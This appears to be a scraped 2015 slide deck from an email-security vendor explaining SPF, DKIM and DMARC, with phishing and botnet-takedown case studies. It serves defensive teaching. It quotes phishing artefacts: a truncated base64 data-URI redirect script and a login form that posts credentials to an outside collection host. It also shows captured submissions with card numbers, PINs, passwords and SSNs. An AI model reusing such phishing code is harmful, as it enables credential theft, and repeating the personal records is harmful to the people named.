Upload
duongnguyet
View
220
Download
1
Embed Size (px)
Citation preview
© 2015 Agari
● EMPLOYEE #4 AT AGARI
● FIELD CTO
● MANAGED JP MORGAN CHASE’S IMPLEMENTATION OF DMARC
● PERSONALLY INVOLVED IN THE 2013 CITADEL TAKEDOWN EFFORT
● PREVIOUS ROLES:
- CTO of Brandmail Solutions, Concurro, and 365 Media
- Director, Strategic Projects at SAP
2
About your speaker: John Wilson
© 2015 Agari
● DMARC pioneer with PayPal, Google &
Yahoo!
● DMARC is only open email standard to
protect brands & consumers from fraud
● Founder & CEO Patrick Peterson built
SenderBase at IronPort, the first email
reputation service
● Engineering & Data Science team = deep
security heritage (IronPort, Cisco, Proofpoint, FireEye…)
Agari secures email as a primary channel of digital engagement,
eliminating brand abuse and consumer fraud
About Agari
© 2015 Agari
Agenda
• The Road to DMARC
• Technical Overview of SPF, DKIM, and DMARC
• Practical Examples & War Stories
• Q & A
4
© 2015 Agari
Email Arms Race
7
IP Reputation - SenderBase (Cisco)
- SenderScore (Return Path)
- Blacklists (SORBS, SpamHaus)
Compromise a “Good” Server
Content Filtering - words/word combinations
- virus scanning
- URL scanning
- Fingerprinting
Obfuscation - “Vi@gra”, HTML
Modify binary until it isn’t detected
URL Shorteners, redirectors
Varying subjects & content
Append random blocks of text
Spamtraps Use real addresses
- captured in a breach
- harvested from an address book
© 2015 Agari 8
October 5, 2007: The PayPal/Yahoo Experiment
Idea:
Ask Yahoo to block non-authenticating
paypal.com messages.
Challenge:
How to ensure SPF and DomainKeys are
properly configured and working as expected?
- Yahoo supported PayPal with metadata
about all paypal.com email including
SPF/DK status
- PayPal used data to perfect SPF/DK
- Experiment proved that blocking messages
based on email authentication failures was
highly effective at preventing exact-domain
phishing
© 2015 Agari
● DMARC standard adds enforceable policy and a feedback loop to SPF & DKIM to combat
spoofed email, standardizing an effective solution at internet scale
● Email receivers have adopted DMARC – senders can leverage the standard to eliminate
phishing, restore consumer trust and allow targeted tracking of abuse
9
DMARC lets Everyone in on the Fun
DMARC RECEIVERS
DMARC PARTICIPANTS
DMARC.ORG PARTICIPANTS
© 2015 Agari 11
SPF: Sender Policy Framework
SPF Record for apple.com:
SPF authenticates the Envelope Domain
SPF breaks when messages are relayed/auto-forwarded
© 2015 Agari 12
DKIM: DomainKeys Identified Mail
DKIM is based on a cryptographic signature that is applied by the sending mail
server. The signature is added as a special message header:
The signing domain and the “selector” are used
by the receiving mail server to locate the public
key record in DNS.
The public key is then used to verify the signature. If the signature verifies, we
know that the signed headers and message body weren’t modified after signing.
© 2015 Agari
- Authenticates Network Path
- Authorized servers via DNS
- Very low operational cost
- Envelope / From Header Alignment required
- Authenticates Message Header/Body
- Publish public keys in DNS
- Requires digital signature on each
outbound message
- Signing / From Header Alignment required
13
DMARC Adds the Policy Layer to DKIM & SPF
Senders declare how
to process unauthenticated
Receivers provide feedback on
messages failing authentication
POLICY VISIBILITY
DKIM SPF
DMARC
© 2015 Agari 14
DMARC Record examples
Monitor policy example:
Quarantine policy example:
Reject policy example:
© 2015 Agari 16
DMARC Forensic Feedback Example
Full Message Example (hotmail.com, outlook.com, etc.):
© 2015 Agari
Typical DMARC Policy Enforcement
Flow
17
From: [email protected]
Subject: Urgent Alert!
Do SPF or DKIM prove this message was
sent by example.com?
Yes No
Is the content
OK?
What is example.com’s
DMARC policy? none
© 2015 Agari 19
Limitations
- DMARC does not solve the “Friendly From” Problem:
- Inbox differentiation may help here
- If your mail provider doesn’t support DMARC, the bad stuff still gets through
- This is an ever-decreasing pool
- Herd Immunity
From: PayPal Security <[email protected]
© 2015 Agari
Sophisticated Phish
23
<script type="text/javascript">
window.location.href = "data:text/html;charset=utf-
8;base64,PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCA
xLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3AgDQogICANCiA
gICAgDQogICAgIA0KICAgDQoNCjxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW5
0PSIiPg0KPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IiI… LOTS
OF STUFF REMOVED …%3D”
</script>
The data: URI scheme is defined in RFC 2397
© 2015 Agari
Sophisticated Phish
25
<form id="frmLogin" name="frmLogin" method="post"
action="http://e549a200372db9f3fcfac9f384e4ac2d.verifyinf
o.net/end.php" class="validationName:(login) validate:()"
autocomplete="off" enctype="application/x-www-form-
urlencoded">
The host collecting the phished data is
e549a200372db9f3fcfac9f384e4ac2d.verifyinfo.net.
But…you can’t simply scan the email to find the phishing site.
The end.php script didn’t contain any branding, so an automated scan wouldn’t
necessarily detect it as a phishing site.
© 2015 Agari
Would you like some malware with your
phish?
26
At this point, the phishing page tried to download a
malicious program posing as a Java update.
© 2015 Agari
Detecting Yesterday’s Threats Today!
27
Here’s a sample message
containing a malicious
attachment posing as a
voicemail message.
The attack ran from 8am –
10am UTC on February
26th, 2015.
© 2015 Agari
Detecting Yesterday’s Threats Today!
28
Here we see an email-based malware attack launched on February 26, 2015.
On the 26th, VirusTotal showed 0/57 detection rate!
This is my ESET signature update for February 27th, 2015, which now detects
Win32/Dridex.K, the malware variant sent in the February 26th campaign.
What a difference a day makes!
© 2015 Agari 29
Case Study: A Global Logistics Company
On April 10 – 18, 2014, criminals attempted to use a global logistics company’s
domain to send a malicious email containing a malware attachment. The attack
ran in 3 waves. Wave 1 used the same subject line, while waves 2 & 3 used
different shipment numbers.
Wave 1
50,120 hosts
Wave 2
34,877 hosts Wave 3
29,670 hosts
© 2015 Agari 30
Case Study: A Global Logistics Company
On April 10 – 18, criminals attempted to use ups.com to send a malicious email
containing a malware attachment. The attack ran in 3 waves. Wave 1 used the
same subject line, while waves 2 & 3 used different shipment numbers.
Wave 1
50,120 hosts
Wave 2
34,877 hosts Wave 3
29,670 hosts
© 2015 Agari
Attack Host Overlap*
33
2,996
5,576
2,100 1,480
18,860 10,784
11,618
Wave 1
Wave 2
Wave 3
Legend
* Not including known relays
© 2015 Agari 35
Send them Packing
50-100M fraudulent messages daily
Sent from t.co domain
DMARC reject policy published March 13, 2013
Abuse stopped completely 2 days later
Twitter was able to redeploy dozens of resources
© 2015 Agari
From: [email protected]
Subject: Form Submission
Disposition: REJECT
Source IP: 34.56.2.7
----------
fname: Joe
lname: Smith
cardn: 1432234202341232
pin: 2198
phone: 2125551523
addr1: 172 W. 48th St.
addr2: apt. 12
city: New York
state: NY
zip: 10036
email: [email protected]
username: jsmith74
password: colgateBS95
ssn: 034-21-9987
From: [email protected]
Subject: Form Submission
Dispostion: REJECT
Source IP: 34.56.2.7
----------
fname: Samuel
lname: Burroughs
cardn: 1432872198722443
pin: 8871
phone: 7162321023
addr1: 41 Pullman Ave.
addr2:
city: Rochester
state: NY
zip: 14615
email: [email protected]
username: samthepianoman
password: 11fingers
ssn: 414-54-0082
From: [email protected]
Subject: Form Submission
Disposition: REJECT
Source IP: 34.56.2.7
----------
fname: Raj
lname: Venkatasubramanian
cardn: 1432399864365132
pin: 3388
phone: 4089761023
addr1: 341 Kenmore Avenue
addr2:
city: Sunnyvale
state: CA
zip: 94086
email: [email protected]
username: rvenkat88
password: #shilpa$
ssn: 997-29-2101
14,000+ Total Submissions
~ 80% appeared to be real credentials
1. DMARC prevented delivery to the criminal
2. We knew the criminal’s email address
3. We knew the gullible bank clients
Not the Sharpest Tool in the Shed
37
© 2015 Agari
Twitter Investigates (And Takes
Action!)
47
1. Which accounts created the batch of t.co URLs?
2. What IP addresses were used to create those accounts?
3. What other accounts were created from those IP addresses?
4. Twitter removes the 1,600 t.co URLs
5. Twitter kills more than 20K user accounts
© 2015 Agari
Citadel Botnet Takedown: Agari’s Role
• Provided intelligence on Citadel root cause - phishing emails with
malicious URLs using web exploits for Citadel malware installation
– Data must be provided at Internet scale and in real-time
• Leveraged data on fraudulent email purporting to be from seven FS-
ISAC members sent to ~1B consumer mailboxes
• Submitted data on 3,762,605 emails from 4 March – 19 April 2013 to
Microsoft’s Digital Crimes Unit for analysis – 40% phish, 60% malware (Source: Microsoft)
Malicious Message Example 1
Malicious Message Example 2
49
© 2015 Agari
Data Flow: From Spam to Intelligence
1. Criminals send spoofed
messages purporting to be
from FS-ISAC members.
2. Receivers send forensic copies
of the spoofed messages to Agari
for analysis.
3. Agari sends forensic analysis
to the Microsoft DCU for further
analysis and correlation with
additional data.
50
© 2015 Agari
Filtering for Relevant Information
Filter for messages
based on member
domain, header
information,
authentication fails,
server origination
Find matching messages,
extract URLs, validate
owned & safe URLs,
create tuples for
remaining URLs
51
© 2015 Agari
Map Showing a Single Day’s Worth of Data
22,245 sources of spoofed messages purporting to be from
participating FS-ISAC member domains April 6, 2013
52
© 2015 Agari
Agari Supported Microsoft as a Declarant
• Agari provided a declaration in support of the TRO, Seizure Order, and
Order to Show Cause
53
© 2015 Agari 54
Resources
John Wilson (Happy to answer questions, present to your team, etc.)
Agari (Free DMARC resources)
http://agari.com/tools/
DMARC.org (You can find the specification here!)
http://www.dmarc.org
© 2015 Agari
Provider Mailboxes Data Enforcement Msg Level
Yahoo! 320 Million ✔ ✔ ✔*
AT&T (via Yahoo) 8 Million ✔ ✔ ✔*
Rogers Communications (via Yahoo) 10 Million ✔ ✔ ✔*
Verizon (via Yahoo) 6 Million ✔ ✔ ✔*
Xtra, SBC, Ameritech, and additional Y! partners 20 Million ✔ ✔ ✔*
Google (Including 4.6M Apps Domains) 425 Million ✔ ✔ soon?
Microsoft (Hotmail, Live.com, Outlook.com, MSN) 380 Million ✔ ✔ ✔
AOL 50 Million ✔ ✔ 2014
Comcast 20 Million ✔ ✔
NetEase (163.com, 126.com, yeah.net) 510 Million ✔ ✔ ✔**
xs4all.nl 1 Million ✔ ✔
Mail.ru 300 Million ✔ ✔
Yandex 200 Million ✔
LinkedIn - ✔ ✔ ✔
Facebook 800 Million ✔
iCloud ? 2015 2015
Mercury.net (including 177 customer domains) ? ✔
* Via Private Channel
DMARC Receivers
58
* URLs only; via private channel ** Full body available upon request
© 2015 Agari
* Via Private Channel
Soon you too can be a DMARC Receiver!
59
Open Source Status
Sendmail (via OpenDMARC) production
Postfix (via OpenDMARC) production
Commercial Status
Google Apps production
Cisco/IronPort production
Proofpoint Summer 2015
Microsoft Office 365 Spring 2015
Symantec Cloud production
Message Systems (via OpenDMARC) production